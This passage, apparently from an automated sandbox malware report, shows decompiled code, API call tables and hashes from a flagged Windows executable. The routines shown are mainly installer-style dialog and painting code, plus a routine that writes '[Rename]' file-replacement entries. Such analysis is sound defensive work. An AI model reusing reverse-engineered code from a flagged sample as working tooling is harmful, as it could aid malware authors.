					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404f0d
0x00404f26
0x00404f2b
0x00404f33
0x00404f39
0x00404f4f
0x00404f52
0x0040517d
0x00405184
0x00405198
0x00405186
0x00405188
0x0040518b
0x0040518c
0x00405193
0x00405193
0x004051a4
0x004051b2
0x004051b5
0x004051cb
0x00405240
0x00405243
0x00405245
0x0040524f
0x0040525d
0x0040525d
0x0040525f
0x00405269
0x0040526f
0x00405272
0x00405275
0x00405290
0x00405277
0x00405281
0x00405281
0x00405275
0x00405269
0x00000000
0x00405243
0x004051d0
0x004051db
0x004051e0
0x004051e7
0x004051ec
0x004051f0
0x004051fb
0x004051fb
0x004051ff
0x00405203
0x00405207
0x0040521a
0x00405209
0x00405209
0x00405210
0x00405216
0x00405212
0x00405212
0x00405212
0x00405210
0x0040521e
0x00405220
0x00405233
0x00405236
0x00405239
0x00405239
0x00405203
0x00000000
0x004051f0
0x004051d2
0x004051d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405293
0x00405293
0x0040529a
0x0040530b
0x00405313
0x0040531b
0x0040531b
0x00405324
0x00405326
0x0040532d
0x00405330
0x00405330
0x00405336
0x0040533d
0x00405340
0x00405340
0x00405346
0x0040534c
0x00405352
0x00405352
0x0040535f
0x004054c0
0x004054c7
0x004054e4
0x004054ea
0x004054fc
0x004054fc
0x00000000
0x00405365
0x00405367
0x0040536c
0x00405371
0x00405376
0x00405378
0x00405378
0x00405379
0x0040537a
0x0040537c
0x0040537c
0x00405384
0x004053c5
0x004053c7
0x004053d7
0x004053da
0x004053df
0x004053e6
0x004053e9
0x0040548b
0x00405494
0x0040549c
0x0040549c
0x004054a2
0x004054aa
0x004054bb
0x004054bb
0x00000000
0x004054aa
0x004053ef
0x004053f2
0x004053f8
0x004053fd
0x004053ff
0x00405401
0x00405407
0x0040540e
0x00405413
0x0040541a
0x0040541d
0x0040541d
0x00405424
0x00405430
0x00405434
0x00405436
0x00405436
0x00405426
0x00405428
0x00405428
0x00405456
0x00405462
0x00405471
0x00405471
0x00405473
0x00405476
0x0040547f
0x00000000
0x00405386
0x00405391
0x00405394
0x00405399
0x0040539b
0x0040539f
0x004053af
0x004053b9
0x004053bb
0x004053be
0x00000000
0x00000000
0x00000000
0x00000000
0x004053a1
0x004053a1
0x004053a7
0x004053a9
0x004053a9
0x004053aa
0x004053ab
0x00000000
0x004053a1
0x00405384
0x0040535f
0x004052a2
0x00000000
0x004052b8
0x004052c2
0x004052c7
0x00000000
0x00000000
0x004052d9
0x004052de
0x004052ea
0x004052ea
0x004052ec
0x004052fb
0x004052fd
0x00405301
0x00405304
0x00000000
0x00405304
0x004052a2
0x00404f58
0x00404f5d
0x00404f66
0x00404f6d
0x00404f7f
0x00404f8a
0x00404f90
0x00404f9e
0x00404fb2
0x00404fb7
0x00404fc4
0x00404fc9
0x00404fdf
0x00404ff0
0x00404ffd
0x00404ffd
0x00405000
0x00405006
0x00405008
0x0040500b
0x00405010
0x00405015
0x00405017
0x00405017
0x00405037
0x00405037
0x00405039
0x0040503a
0x0040503f
0x00405045
0x00405049
0x0040504e
0x00405056
0x0040505a
0x0040505f
0x00405064
0x0040506c
0x0040506f
0x0040513f
0x00405152
0x00000000
0x00405075
0x00405078
0x0040507b
0x0040507e
0x0040507e
0x00405084
0x0040508d
0x00405090
0x00405094
0x00405097
0x0040509a
0x004050a3
0x004050ac
0x004050af
0x004050b2
0x004050b5
0x004050f3
0x0040511e
0x004050f5
0x00405104
0x00405104
0x004050b7
0x004050ba
0x004050c8
0x004050d2
0x004050da
0x004050e1
0x004050ec
0x004050ec
0x004050b5
0x00405124
0x00405125
0x00405131
0x00405131
0x0040513d
0x00405158
0x0040515b
0x00405178
0x00000000
0x0040515d
0x00405162
0x0040516b
0x004054fe
0x00405510
0x00405510
0x0040515b
0x00000000
0x0040513d
0x0040506f

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

M, xrefs: 004050BA
, xrefs: 004054D4
@6l, xrefs: 004054A2
N, xrefs: 0040519B

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $@6l$M$N
API String ID: 2564846305-3836762863
Opcode ID: dd942b7cbeaa18c8cf4828e28d43e61687b6a80dcb186ef465745c56d9013c5d
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: dd942b7cbeaa18c8cf4828e28d43e61687b6a80dcb186ef465745c56d9013c5d
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404658 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x6bdacc
						_t29 = _t69 + 0x14; // 0x6bdae0
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t111 =  *0x433edc; // 0x6c3640
					_t75 =  *(_t111 - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}

0x0040466a
0x00404797
0x004047f4
0x004047f8
0x004048c5
0x004048c7
0x004048c7
0x004048cd
0x004048cd
0x004048d0
0x00000000
0x004048d7
0x00404806
0x0040480c
0x00404816
0x00404821
0x00404824
0x00404827
0x00404832
0x00404835
0x0040483c
0x00404849
0x0040485a
0x00404860
0x00404868
0x00404876
0x0040487c
0x0040487c
0x0040483c
0x00404886
0x00000000
0x00404891
0x00404895
0x004048a5
0x004048a5
0x004048ab
0x004048b7
0x004048b7
0x00000000
0x004048bb
0x00404886
0x004047a2
0x00000000
0x004047b4
0x004047b4
0x004047b9
0x004047b9
0x004047bf
0x00000000
0x00000000
0x004047e8
0x004047ea
0x004047ef
0x00000000
0x004047ef
0x004047a2
0x00404670
0x00404673
0x00404678
0x0040467a
0x00404689
0x00404689
0x00404691
0x00404694
0x00404698
0x0040469b
0x0040469f
0x004046a2
0x004046a5
0x004046a8
0x004046af
0x004046b1
0x004046b1
0x004046bb
0x004046c8
0x004046d2
0x004046d7
0x004046da
0x004046df
0x004046f6
0x004046fd
0x00404710
0x00404713
0x00404727
0x0040472e
0x00404733
0x00404738
0x00404738
0x00404746
0x00404754
0x00404766
0x0040476b
0x0040477b
0x0040477d
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

N, xrefs: 004047F4
@6l, xrefs: 0040467A
Call, xrefs: 00404835

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: @6l$Call$N
API String ID: 3103080414-3783438084
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00406183
0x0040618c
0x00406193
0x0040619d
0x004061b1
0x004061d9
0x004061e4
0x004061e8
0x00406208
0x0040620f
0x00406219
0x00406226
0x0040622b
0x00406230
0x00406234
0x00406243
0x00406245
0x00406252
0x00406256
0x004062f1
0x00000000
0x0040626c
0x00406279
0x0040629d
0x004062a1
0x004062c0
0x004062c4
0x004062c4
0x004062c6
0x004062cf
0x004062da
0x004062e5
0x004062eb
0x00000000
0x004062eb
0x004062a3
0x004062a6
0x004062b1
0x004062ad
0x004062af
0x004062b0
0x004062b0
0x004062b8
0x004062ba
0x00000000
0x004062ba
0x00406284
0x0040628a
0x00000000
0x0040628a
0x00406256
0x00406234
0x004061b3
0x004061be
0x004061c7
0x004061cb
0x00000000
0x00000000
0x004061cb
0x004062fc

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

%ls=%ls, xrefs: 004061F8
[Rename], xrefs: 0040626C, 0040627E

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 6dbc896bee28fc2cd17c6beb7c7e3b01e9a95bb407788db3ff507c40593cf796
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
Opcode Fuzzy Hash: 6dbc896bee28fc2cd17c6beb7c7e3b01e9a95bb407788db3ff507c40593cf796
